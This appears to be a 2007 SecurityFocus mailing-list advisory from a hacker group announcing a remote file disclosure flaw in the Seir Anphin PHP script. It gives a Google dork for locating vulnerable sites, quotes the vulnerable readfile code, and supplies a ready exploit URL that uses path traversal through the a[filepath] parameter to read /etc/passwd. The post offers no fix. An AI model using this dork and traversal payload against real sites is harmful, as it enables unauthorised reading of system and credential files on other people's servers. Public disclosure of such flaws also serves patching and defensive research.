Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability Apr 28 2007 01:01PM
ilkerkandemir mynet com
------------------------------------------------------------------------
----------
AYYILDIZ.ORG PreSents...

Script: Seir Anphin
Script Download: http://www.anphin.com/index.php?m=file&op=download&id=1
Dork:"Powered by Seir Anphin"

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info: */Siz Yokken AYYILDIZ Vardi.*/
------------------------------------------------------------------------
-----------
Bug:
exit();
header("Content-Disposition: attachment; filename=\"$filename\"");
header('Content-Length: ' . filesize($a['filepath']));
readfile($a['filepath']);
exit();

------------------------------------------------------------------------
-----------

Exploit: [Seir_Anphin_Path]/modules/file.php?a[filepath]=../../../etc/passwd

------------------------------------------------------------------------
-----------

Tnx:H0tturk,Dr.Max Virus,Gencnesil,Str0ke
Special Tnx: AYYILDIZ.ORG

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus